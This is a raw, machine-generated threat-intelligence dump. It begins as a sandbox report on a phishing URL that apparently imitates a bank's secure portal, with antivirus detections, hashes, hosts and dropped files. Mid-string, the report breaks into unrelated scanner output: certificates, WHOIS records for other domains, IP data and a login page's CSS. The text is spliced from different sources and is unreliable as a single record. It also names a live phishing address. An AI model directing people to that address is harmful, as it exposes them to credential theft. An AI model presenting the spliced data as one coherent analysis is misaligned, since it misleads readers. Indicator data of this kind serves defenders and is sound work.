u'description': u'Dropped file: "YPIJJ971.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YPIJJ971.txt]- [targetUID: 00000000-00002688]\n Dropped file: "AI051CXT.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AI051CXT.txt]- [targetUID: 00000000-00002688]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF9F132CAB72D9C597.TMP" has type "data"- Location: [%TEMP%\\~DF9F132CAB72D9C597.TMP]- [targetUID: 00000000-00002688]\n "YPIJJ971.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YPIJJ971.txt]- [targetUID: 00000000-00002688]\n "~DF1675A0CFA222883C.TMP" has type "data"- Location: [%TEMP%\\~DF1675A0CFA222883C.TMP]- [targetUID: 00000000-00002688]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "_0DA7B08D-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "AI051CXT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AI051CXT.txt]- [targetUID: 00000000-00002688]\n "_177B0170-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF03727103672B0498.TMP" has type "data"- Location: [%TEMP%\\~DF03727103672B0498.TMP]- [targetUID: 00000000-00002688]\n "zYXgKVElMYYaJe8bpLHnCwDKhdHeEw_1_.woff" has type "Web Open Font Format TrueType length 22912 version 1.1"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF1E505D7FA00BDD24.TMP" has type "data"- Location: [%TEMP%\\~DF1E505D7FA00BDD24.TMP]- [targetUID: 00000000-00002688]\n "RecoveryStore._0DA7B08B-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_BDAF2F6C-5C5B-11ED-BC85-08002753B60E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD2F78EE99E0F6CB3.TMP" has type "data"- Location: [%TEMP%\\~DFD2F78EE99E0F6CB3.TMP]- [targetUID: 00000000-00002688]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00002688]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://portalseguro.jdavivienda.repl.co/"\n Pattern match: "http://portalseguro.jdavivienda.repl.co"\n Heuristic match: "portalseguro.jdavivienda.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'13/90 Antivirus vendors marked sample as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'13/90 reputation engines marked "http://portalseguro.jdavivienda.repl.co" as malicious (14% detection rate)\n 13/90 reputation engines marked "http://portalseguro.jdavivienda.repl.co/" as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'13/90 Antivirus vendors marked sample as malicious (14% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'636546f1c8821122f4144205', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.149.204.188', u'172.253.122.95', u'142.251.163.94'], u'sha256': u'cb918fa800dd16d2fa429f0f57ecba53ee3b499d259f9b6b37388e085009756c', u'sha512': u'c4e316542b3c0edd73a72152a44e6bac580835dc052a34e48597f37d16bca44ed996e479de866259ce06a96c1e7d4660a0232afd0b4378784b11d43953f1d6a8', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://portalseguro.jdavivienda.repl.co/', u'submission_id': u'636546f2c8821122f4144206', u'created_at': u'2022-11-04T17:08:02+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-04T17:08:02+00:00', u'tags': [u'phishing'], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 7, u'machine_learning_models': [], u'total_signatures': 12, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'8f96a7d46dd48cbbbc5299452bb488ff', u'network_mode': u'default', u'processes': [], u'sha1': u'f7a49959ced159445661e0178129a04489bcc166', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'portalseguro.jdaviviend 34.149.204.188 2022-12-18 00:03:10 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 48:20:40:e9:11:6c:46:fc:13:c8:c6:91:95:a6:d1:9b Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Oct 30 20:43:46 2022 GMT Not After : Jan 28 20:43:45 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ba:e1:72:b5:c9:5e:55:dd:88:0b:d7:34:57:98: e0:d5:b8:0e:28:61:25:ee:fa:ac:c2:73:87:c5:9d: fe:ef:08:f9:00:a8:f8:26:a6:f1:1b:9b:b5:8f:d9: fc:63:ed:9a:90:93:9d:52:4d:71:01:18:82:17:5b: 61:a2:75:21:9b:b2:9e:fe:5b:be:9c:5d:18:75:97: 55:08:68:f5:67:68:86:06:e9:5b:b5:42:4b:48:f6: ee:05:0b:99:62:c8:a8:74:e0:4e:70:4b:74:83:ae: 55:b3:01:a0:7f:8e:72:ee:5b:f9:74:97:45:88:f6: 76:97:a7:c2:e2:21:74:02:5d:8e:41:60:21:73:4b: 5d:c0:c1:a3:c4:58:24:34:8f:e3:34:dd:cf:c9:f0: e2:a0:47:87:d7:29:34:44:40:d1:3f:55:83:ea:dd: 67:59:7a:30:50:01:c3:b6:f3:b2:ca:05:1d:b3:eb: ae:61:b7:f4:13:94:90:a0:b6:54:d6:20:16:e5:01: e8:83:b4:2a:e6:f0:c5:cb:8a:29:3d:89:7c:49:7a: a0:90:63:f7:8f:33:f9:ce:b4:7e:df:d8:16:8b:83: 45:c0:0e:15:01:03:1e:fd:9a:7a:55:d7:64:a7:39: ba:85:2c:c2:81:0f:4c:52:92:21:81:ed:02:f8:dc: 82:6f Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 8D:8C:CC:F4:82:11:E1:FE:38:8C:7A:89:4C:FB:51:C6:26:33:92:56 X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/N5PKkvSDEsE CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/lyHNLHo1elk.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 4a:80:0e:26:2f:d2:cd:b6:d1:0d:19:c4:bb:37:bc:46:15:1b: f5:bd:91:e7:c5:9b:5c:a5:26:35:62:e8:4c:25:8f:60:2b:2c: 44:61:20:fa:5a:c5:4f:fd:a1:ea:2a:de:24:0f:90:61:cd:91: bc:7c:af:fd:e7:f9:1e:6a:94:25:f2:c6:d8:9b:a8:18:73:cc: fe:12:71:06:29:0c:f2:c7:31:03:ff:f7:32:36:a6:e0:08:c5: f3:3b:15:4b:8e:ae:1d:b7:ca:a6:39:35:ba:13:10:a0:e9:34: e0:6f:d5:23:60:1d:8b:40:ab:b5:f0:49:7a:a7:15:b6:71:84: 94:b2:73:03:ab:bd:f3:fa:07:20:05:57:e1:98:70:ac:e2:7b: 51:01:c5:43:f3:6b:00:7a:3d:d7:fe:13:99:91:be:3b:91:d7: 9d:a1:a0:39:0d:e1:df:23:d1:74:67:09:b7:3b:42:e6:a1:64: 72:4e:a8:d2:63:8d:85:39:02:cc:c6:bf:b3:0b:36:ed:73:5e: 62:ad:bb:9c:68:f4:47:1b:24:7d:0d:15:6d:18:ac:aa:b2:dd: e7:ae:2e:9b:14:6c:8f:18:20:73:76:a2:06:b8:f0:c1:fd:db: 23:37:01:db:71:02:9f:d6:2a:25:fc:03:cf:20:10:89:84:9a: f7:ac:db:e1 plague.fun 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2082 104.21.7.179 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://plague.fun/ 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0cb6b7b4e2c4c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.137.37 2022-12-18 00:02:52 Domain Whois No Whois 11 0 1 0 None Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp misogyny.wtf 2022-12-18 00:14:32 Country No Country Name Extractor 0 0 3 0 None United States Kansas City, Missouri, MO, United States, US 2022-12-18 00:18:44 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.97.1] https://www.virustotal.com/en/ip-address/188.114.97.1/information/ 188.114.97.1 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 179.204.149.34.bc.googleusercontent.com 34.149.204.179 2022-12-18 00:03:24 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:05:62:a3:2a:56:6a:d6:e7:de:85:5f:24:ee:fd:d0:9c:8a Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 00:45:18 2022 GMT Not After : Sep 23 00:45:17 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:d4:d3:1e:2e:64:b9:23:19:ce:c1:76:2c:4d:10: be:a7:68:fc:7c:b6:7d:e6:82:bb:d7:ee:d1:4e:63: 0b:9e:ad:c3:63:af:d4:36:22:f0:7e:31:d0:96:4a: 0a:a6:d8:32:94:5e:f5:33:45:27:83:a8:84:f3:0c: d4:38:c0:90:ca:bb:67:fb:2f:bd:2c:02:19:2f:cc: 71:0a:be:75:68:08:3b:cd:38:60:b7:ee:8b:2e:a6: b5:82:dc:b3:e3:b2:a1:e8:dc:2a:57:c6:d5:41:99: 54:ba:0e:fa:92:84:f1:45:24:58:76:79:96:64:e6: c1:50:ae:31:3e:8b:dc:65:d5:c3:bf:5b:9e:47:2c: 82:81:92:5a:38:b7:b6:d3:a2:1b:1b:a2:0e:5e:55: 73:53:58:16:be:dc:7a:c0:9c:f9:70:a3:73:f7:69: 86:b5:ef:c3:9b:6e:f8:5c:b6:59:d7:fe:b0:84:ff: 23:bd:bf:47:d4:49:9f:7c:54:1e:7b:db:5f:fe:cf: d9:0c:22:87:c7:bd:de:3f:e9:77:94:ba:a9:fe:ce: 0c:e9:e2:21:68:88:3e:6c:c6:bb:cd:0a:1f:47:b6: ac:fe:7d:77:7d:16:d2:30:74:f7:6f:b0:27:19:81: 49:95:ba:01:5a:c9:2e:0d:be:94:72:a4:56:59:8c: ce:b5 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5D:E4:A6:AA:5A:2B:6A:0A:62:3D:88:7F:B5:09:6F:59:0E:78:37:3B X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jun 25 01:45:18.644 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:B1:30:2F:FD:E4:95:E3:5D:06:43:11: 91:81:0D:0D:37:DB:E2:D2:02:A5:67:6F:25:4C:A7:1E: 2F:93:7F:E1:02:02:20:3B:F9:88:E0:18:ED:07:10:B8: B9:DC:04:C3:5E:AA:D1:B3:01:6D:DC:C5:A4:C0:0B:78: FC:60:CD:0D:E3:EB:FE Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jun 25 01:45:18.775 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:D6:45:22:3E:9E:8E:80:C5:99:EC:1B: BA:F1:4F:06:F1:BD:7F:FC:39:D7:9E:D2:5A:C0:A9:57: 5D:92:C5:D1:B2:02:21:00:94:A7:55:6B:48:06:80:EF: 39:F4:50:E1:27:23:B8:B7:4A:77:49:99:44:03:2A:3C: 24:A7:AA:A2:31:58:D6:F7 Signature Algorithm: sha256WithRSAEncryption 70:47:9f:2f:cd:98:00:8f:cf:16:55:84:71:c7:cf:ee:a5:ee: 3b:92:fe:aa:de:e3:82:90:4a:9e:8e:6b:25:65:cb:1c:97:e2: 3d:8b:2b:fc:5b:14:af:0b:31:c9:2d:15:54:20:60:72:05:b6: 8c:45:b9:a2:ea:86:2a:ca:78:fe:d4:2c:98:57:dd:08:e1:72: 5a:16:be:91:29:90:d9:35:81:21:d8:c1:95:38:43:d7:29:3e: dc:73:af:9b:cd:6b:92:1e:98:be:99:d7:8c:b6:e2:bb:48:bc: 8c:43:2c:9b:09:54:10:0e:78:44:22:46:d6:20:06:28:ff:98: 5c:0f:02:78:8e:9a:2b:02:6e:12:24:99:93:db:28:78:e6:05: c7:2b:f1:36:05:48:e1:84:75:47:1f:65:df:f0:a7:69:c3:03: 62:7b:83:7e:bd:c7:10:02:ae:59:eb:37:72:0a:c1:6a:59:c8: d2:57:4b:dd:d5:51:e7:cc:82:4e:30:97:6f:0a:57:7b:e9:d7: 06:81:47:76:78:e2:e0:ad:30:f9:1e:aa:ed:3c:f9:3c:22:50: 4b:8c:27:58:e6:49:bd:f7:e7:07:25:05:e3:c6:4c:da:f7:88: 8d:dc:02:a5:9a:9c:32:67:91:39:e6:09:97:e9:ee:a5:07:fb: 40:f1:d4:3e 2022-12-18 00:20:49 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-12-01T23:22:41.700Z", "ip": "51.103.210.236", "location_updated_at": "2022-12-18T00:20:46.477571Z", "autonomous_system_updated_at": "2022-12-18T00:20:46.477571Z", "location": {"province": "Zurich", "city": "Zurich", "country": "Switzerland", "coordinates": {"latitude": 47.3682, "longitude": 8.5671}, "registered_country_code": "", "postal_code": "8000", "country_code": "CH", "timezone": "Europe/Zurich", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "51.103.0.0/16", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 51.103.210.236 2022-12-18 00:28:20 Web Framework No Web Framework Identifier 0 0 5 0 None Bootstrap @import url("/css/vendor/bootstrap/bootstrap.min.css"); @import url("/css/register/base_buttons.css"); @import url("/css/register/fontface.css"); .navbar > .container .navbar-brand, .navbar > .container-fluid .navbar-brand { text-indent:-9999px; height: 32px; width:230px; margin:15px 0; padding: 0px; } .main-content{ /*padding-top: 50px; */ background: url(/img/promo/promo2.jpg) no-repeat center center fixed; } body .main-content{ -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } .error-alert{ display: none; margin-bottom: 40px; } h1{font-size: 31px; margin-top: 15px;} h2{font-size: 15px; color:#666;} h3{font-size: 51px;} .promo p{font-size:23px; } .form-header .fa-circle{ color: #FBBF3F; } .sidebar { background-color: rgba(255,255,255, 0.9); bottom: 0; display: block; left: 0; overflow-x: hidden; overflow-y: auto; padding:30px; position: fixed; top: 51px; z-index: 1000; /*max-width: 480px;*/ } .sidebar form{ margin-top: 40px; } #login .checkbox{ margin: 20px 0; display: none; } /* input */ .floatlabel { padding: 5px 0 !important; outline: 0; font-size: 14px; width: 100% } .form-group {position: relative; margin-bottom:30px; } .form-group .labelfocus{color: #4A90E2; } .labelFloat, .form-group label{ font-size: 13px; color: #555; margin: 0; } .labelFloat{ left:0px !important; font-size: 13px !important; } .form-control{ background: transparent; border: none; border-bottom: 1px solid #D4D4D4 ; box-shadow: none; border-radius:0; padding: 6px 0; font-size: 15px; color:#444; height: 30px; outline: none; transition-duration: 0.2s; transition-timing-function: cubic-bezier(0.4, 0, 0.2, 1); } .form-control:focus { box-shadow: none; border: none; border-bottom: 1px solid #4A90E2; outline: none; } .form-control::-moz-placeholder { color: #9B9B9B; opacity: 1; } .input-group-addon { background: none; border: none; border-radius: 0; padding: 7px 0; position: absolute; right: 15px; bottom: 0; vertical-align: bottom; } .form-group .input-error{ color: #a94442; font-size: 11px; display:none; } .showpassword { border: none; border-radius: 0; box-shadow: 0; background: transparent; } .dropdown-menu .close { font-size: 15px; background: transparent; opacity: 0.5; } .dropdown-menu .close a:hover{ background: transparent; } .choice-group.btn-group a { display: inline-block; max-width: 110px; } .choice-group.btn-group .caret{vertical-align: text-top;} .choice-group.btn-group i{font-style: normal;} .choice-group.btn-group .dropdown-toggle{text-align: left; padding: 0 5px 0 0; font-size: 12px; white-space: normal;} .choice-group.btn-group .dropdown-toggle:hover{text-decoration: none;} .choice-group.btn-group input[type="radio"] { display:none; } .choice-group.btn-group input[type="radio"] + label span { display:inline-block; width:12px; height:12px; margin:-1px 4px 0 0; vertical-align:middle; cursor:pointer; -moz-border-radius: 50%; border-radius: 50%; } .choice-group.btn-group input[type="radio"] + label span { background-color:transparent; border: 1px solid #449CFA; } .choice-group.btn-group input[type="radio"]:checked + label span{ background-color:#449CFA; } .choice-group.btn-group input[type="radio"] + label span, .choice-group.btn-group input[type="radio"]:checked + label span { -webkit-transition:background-color 0.4s linear; -o-transition:background-color 0.4s linear; -moz-transition:background-color 0.4s linear; transition:background-color 0.4s linear; } .choice-group label[for=ox]::after{ content:url('/img/badge-new-01.png'); display: inline-block; height: 22px; margin-left: 7px; vertical-align: middle; width: 25px; } /* promo */ .promo{ height: 100vh; min-height: 100%; overflow: hidden; /* Permalink - use to edit and share this gradient: http://colorzilla.com/gradient-editor/#000000+0,000000+100&0.2+1,0.6+100 */ background: -moz-linear-gradient(-45deg, rgba(0,0,0,0.2) 0%, rgba(0,0,0,0.2) 1%, rgba(0,0,0,0.6) 100%); /* FF3.6-15 */ background: -webkit-linear-gradient(-45deg, rgba(0,0,0,0.2) 0%,rgba(0,0,0,0.2) 1%,rgba(0,0,0,0.6) 100%); /* Chrome10-25,Safari5.1-6 */ background: linear-gradient(135deg, rgba(0,0,0,0.2) 0%,rgba(0,0,0,0.2) 1%,rgba(0,0,0,0.6) 100%); /* W3C, IE10+, FF16+, Chrome26+, Opera12+, Safari7+ */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#33000000', endColorstr='#99000000',GradientType=1 ); /* IE6-9 fallback on horizontal gradient */ } .promo-group{ position:absolute; height:100%; width:100%; display: table; } .promo-group .row { display: table-cell; vertical-align: middle; width: 70%;} /*.promo-group { top: 150px\9; right: 100px\9; margin-bottom: 0;*/ /*min-height: 100%; *//* Fallback for vh unit */ /*min-height: 100vh;*/ /* You might also want to use 'height' property instead. Note that for percentage values of 'height' or 'min-height' properties, the 'height' of the parent element should be specified explicitly. In this case the parent of '.vertical-center' is the element */ /* Make it a flex container */ /*display: -webkit-box; display: -moz-box; display: -ms-flexbox; display: -webkit-flex; display: flex; */ /* Align the bootstrap's container vertically */ /* -webkit-box-align : center; -webkit-align-items : center; 